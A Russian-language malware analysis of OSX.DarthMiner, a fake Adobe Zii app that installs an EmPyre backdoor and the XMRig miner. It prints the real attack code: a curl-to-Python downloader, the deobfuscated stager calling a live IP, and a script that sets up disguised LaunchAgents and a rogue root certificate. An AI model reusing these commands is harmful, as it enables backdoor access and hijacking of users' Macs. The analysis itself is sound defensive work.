[shadow=SaddleBrown]Вредоносное ПО для Mac объединяет бэкдор EmPyre и майнер XMRig[/shadow]
____________________________________________________________________________________________________________

Ранее на этой неделе мы обнаружили новую вредоносную программу для Mac, которая объединяет два разных инструмента с открытым исходным кодом - бэкдор EmPyre и криптоминер XMRig - для зла.

Вредонос распространялся через приложение под названием Adobe Zii. Adobe Zii - это программное обеспечение, предназначенное для пиратства различных приложений Adobe. В данном случае, однако, приложение называлось Adobe Zii, но оно определенно не было реальным.

http://s5.uploads.ru/t/Qn71c.png

Как видно из приведенных выше снимков экрана, само программное обеспечение Adobe Zii слева использует логотип Adobe Creative Cloud. (В конце концов, если вы собираетесь писать программное обеспечение, чтобы помочь людям красть программное обеспечение Adobe, почему бы не украсть логотип тоже?) Однако в программе установки вредоносных программ используется общий значок апплета Automator.

Поведение

Открытие поддельного приложения Adobe Zii с Automator раскрывает природу программного обеспечения, поскольку оно просто запускает сценарий оболочки:

http://sh.uploads.ru/t/SHfeC.png

Код:
curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app

Этот сценарий предназначен для загрузки и выполнения сценария Python, а затем загрузки и запуска приложения с именем sample.app.

Sample.app прост. Похоже, что это просто версия Adobe Zii, скорее всего, для того, чтобы создать впечатление, что вредоносное ПО на самом деле было «легитимным». (Конечно, это не значит, что компьютерное пиратство является легитимным, а скорее это означает, что вредоносная программа пыталась выглядеть так, как будто она делала то, что, по мнению пользователя, она должна была сделать.)

А как насчет скрипта Python? Оказалось, что это было запутано, но было легко обесценено, обнаружив следующий сценарий:

Код:
import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()
import urllib2;
UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://46.226.108.171:4444';t='/news.php';req=urllib2.Request(server+t);
req.add_header('User-Agent',UA);
req.add_header('Cookie',"session=SYDFioywtcFbUR5U3EST96SbqVk=");
proxy = urllib2.ProxyHandler();
o = urllib2.build_opener(proxy);
urllib2.install_opener(o);
a=urllib2.urlopen(req).read();
IV=a[0:4];data=a[4:];key=IV+'3f239f68a035d40e1891d8b5fdf032d3';S,j,out=range(256),0,[]
for i in range(256):
    j=(j+S[i]+ord(key[i%len(key)]))%256
    S[i],S[j]=S[j],S[i]
i=j=0
for char in data:
    i=(i+1)%256
    j=(j+S[i])%256
    S[i],S[j]=S[j],S[i]
    out.append(chr(ord(char)^S[(S[i]+S[j])%256]))
exec(''.join(out))

Первое, что делает этот скрипт, это ищет присутствие Little Snitch, широко используемого исходящего брандмауэра, способного привлечь внимание пользователя к сетевому соединению бэкдора. Если присутствует Little Snitch, вредоносная программа выручает. (Конечно, если бы установлен исходящий межсетевой экран, такой как Little Snitch, он бы уже заблокировал соединение, которое попыталось бы загрузить этот скрипт, поэтому проверка на этом этапе бесполезна.)

Этот сценарий открывает соединение с серверной частью EmPyre, которая может передавать произвольные команды на зараженный Mac. Как только бэкдор открыт, он получает команду, которая загружает следующий скрипт в /private/tmp/uploadminer.sh и выполняет его:

Код:
# osascript -e "do shell script \"networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http://mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem\" with administrator privileges"
cd ~/Library/LaunchAgents
curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist
curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist
launchctl load -w com.apple.rig.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl -o config.json http://46.226.108.171/config.json
curl -o xmrig http://46.226.108.171/xmrig
chmod +x ./xmrig
rm -rf ./xmrig2
rm -rf ./config2.json
./xmrig -c config.json &

Этот скрипт загружает и устанавливает другие компоненты вредоносного ПО. Агент запуска с именем com.proxy.initialize.plist был создан для постоянного сохранения бэкдора, запустив точно такой же запутанный скрипт Python, упомянутый ранее.

Сценарий также загружает криптоминант XMRig и файл конфигурации в папку / Users / Shared / и настраивает агент запуска с именем com.apple.rig.plist, чтобы процесс XMRig работал с этой конфигурацией активным. (Имя «com.apple» - это красный флажок, который стал основной причиной обнаружения этой вредоносной программы.)

Интересно, что в этом сценарии есть код для загрузки и установки корневого сертификата, связанного с программным обеспечением mitmproxy, которое является программным обеспечением, способным перехватывать весь веб-трафик, включая (с помощью сертификата) зашифрованный трафик «https». Однако этот код был закомментирован, указывая, что он не был активен.

На первый взгляд, эта вредоносная программа выглядит довольно безвредной. Cryptominers, как правило, приводят к замедлению работы компьютера только благодаря процессу, который поглощает весь процессор / графический процессор.

Однако это не просто криптоминер. Важно помнить, что криптоминер был установлен с помощью команды, выданной бэкдором, и вполне могли быть и другие произвольные команды, отправленные бэкдору на зараженные компьютеры Mac в прошлом. Невозможно точно знать, какой вред эта вредоносная программа могла нанести зараженным системам. Тот факт, что мы только наблюдали за поведением майнинга, не означает, что он никогда не делал других вещей.

Последствия

Malwarebytes для Mac обнаруживает эту вредоносную программу как OSX.DarthMiner. Если вы заражены, невозможно сказать, что еще могло сделать вредоносное ПО, кроме криптомайнинга. Вполне возможно, что это могли быть отфильтрованные файлы или захваченные пароли.

Из этого можно извлечь важный урок. Пиратство программного обеспечения, как известно, является одним из самых рискованных действий, которые вы можете предпринять на своем Mac. Опасность заражения высока, и это не ново, но люди все еще занимаются этим поведением. Пожалуйста, в будущем сделайте себе одолжение и не пиратское программное обеспечение. Стоимость может быть намного выше, чем покупка программного обеспечения, которое вы пытаетесь получить бесплатно.

IOCs

Код:
Adobe Zii.app.zip SHA256: ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e